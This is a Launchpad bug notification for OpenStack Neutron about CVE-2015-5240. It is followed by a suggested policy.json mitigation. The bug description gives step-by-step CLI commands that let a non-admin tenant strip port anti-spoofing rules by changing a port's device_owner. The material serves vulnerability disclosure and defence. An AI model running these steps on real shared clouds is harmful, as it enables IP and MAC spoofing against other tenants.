*** This bug is a duplicate of bug 1489111 *** https://bugs.launchpad.net/bugs/1489111

Thanks for filing this. This was actually a vulnerability fixed later in bug 1489111. I think the part that was overlooked was that this could be done on shared networks.

** This bug has been marked a duplicate of bug 1489111
   [OSSA 2015-018] IP, MAC, and DHCP spoofing rules can by bypassed by changing device_owner (CVE-2015-5240)

--
You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1417791

Title:
  Neutron allows non-admin user to circumvent port security via port-update device_owner

Status in neutron:
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Neutron allows a non-admin tenant to circumvent port security and spoof traffic by updating the device-owner to 'network:None' and rebooting the instance.

  How to reproduce:

  1. Create a new tenant: `keystone tenant-create --name demo --enable=true`
  2. Create a new user in that tenant: `keystone user-create --name demo --tenant $TENANT_ID --pass $PASSWORD --enabled true`
  3. Switch to that new user: `export OS_USERNAME=demo; export OS_TENANT_NAME=demo; export OS_PASSWORD=$PASSWORD`
  4. Create a keypair: `nova keypair-add demo-key --pub-key ~/.ssh/authorized_keys`
  5. Create a security group: `neutron security-group-create demo-secgroup`
  6. Add a permit rule to that security group: `neutron security-group-rule-create demo-secgroup --remote-ip-prefix 0.0.0.0/0`
  7. Deploy a new instance: `nova boot --flavor m1.tiny --image ubuntu-14.04 --nic net-id=$NETWORK_ID --key-name demo-key --security-groups demo-secgroup --poll demo-instance`
  8. Find the instance's neutron port: `neutron port-list`
  9. Update neutron port device owner: `neutron port-update $PORT_ID --device_owner network:None`
  10. Verify neutron port device owner updated: `neutron port-show $PORT_ID`
  11. Reboot instance: `nova reboot $INSTANCE_ID`

  When the instance comes back up, it will not have anti-spoofing port security rules present and can source traffic from any IP and MAC combination.

  It doesn't appear like this was intended; in Juno the stock neutron/policy.conf includes:

  ```
  "update_port": "rule:admin_or_owner",
  "update_port:port_security_enabled": "rule:admin_or_network_owner",
  ```

  But the port owner is permitted to modify the device-owner attribute of the port, which allows circumventing the port security.

  I would recommend protecting the device_owner and device_id port attributes so they can only be modified by an admin user.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1417791/+subscriptions
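The mitigation the reporter recommends, written out as a Neutron policy.json fragment. This is an added example, not a patch from the bug or from the Neutron project: it keeps the two Juno rules quoted in the report and adds attribute-level rules that restrict `device_owner` and `device_id` on port update to admin users. The rule names `context_is_admin`, `admin_or_owner`, `admin_or_network_owner` and `admin_only` are the standard ones from Neutron's stock policy file; their definitions are repeated here so the fragment is self-contained.

```json
{
    "context_is_admin": "role:admin",
    "admin_or_owner": "rule:context_is_admin or tenant_id:%(tenant_id)s",
    "admin_or_network_owner": "rule:context_is_admin or tenant_id:%(network:tenant_id)s",
    "admin_only": "rule:context_is_admin",

    "update_port": "rule:admin_or_owner",
    "update_port:port_security_enabled": "rule:admin_or_network_owner",

    "update_port:device_owner": "rule:admin_only",
    "update_port:device_id": "rule:admin_only"
}
```

With only the first two `update_port` rules present (the Juno default), a port owner passes the `update_port` check and no per-attribute rule stops them from rewriting `device_owner` to a `network:` value, which is what step 9 of the reproduction relies on. The two added attribute rules make that same request fail with a policy error for a non-admin. Before deploying this, confirm that your Nova installation uses admin credentials when it sets `device_id` and `device_owner` on the ports it attaches to instances; if it updates ports with the tenant's own token, the stricter rule will break instance boot. Note also that the upstream fix tracked in bug 1489111 addressed the problem through policy on the `device_owner` attribute rather than necessarily this exact rule, so check the policy file shipped with your release before adding overrides.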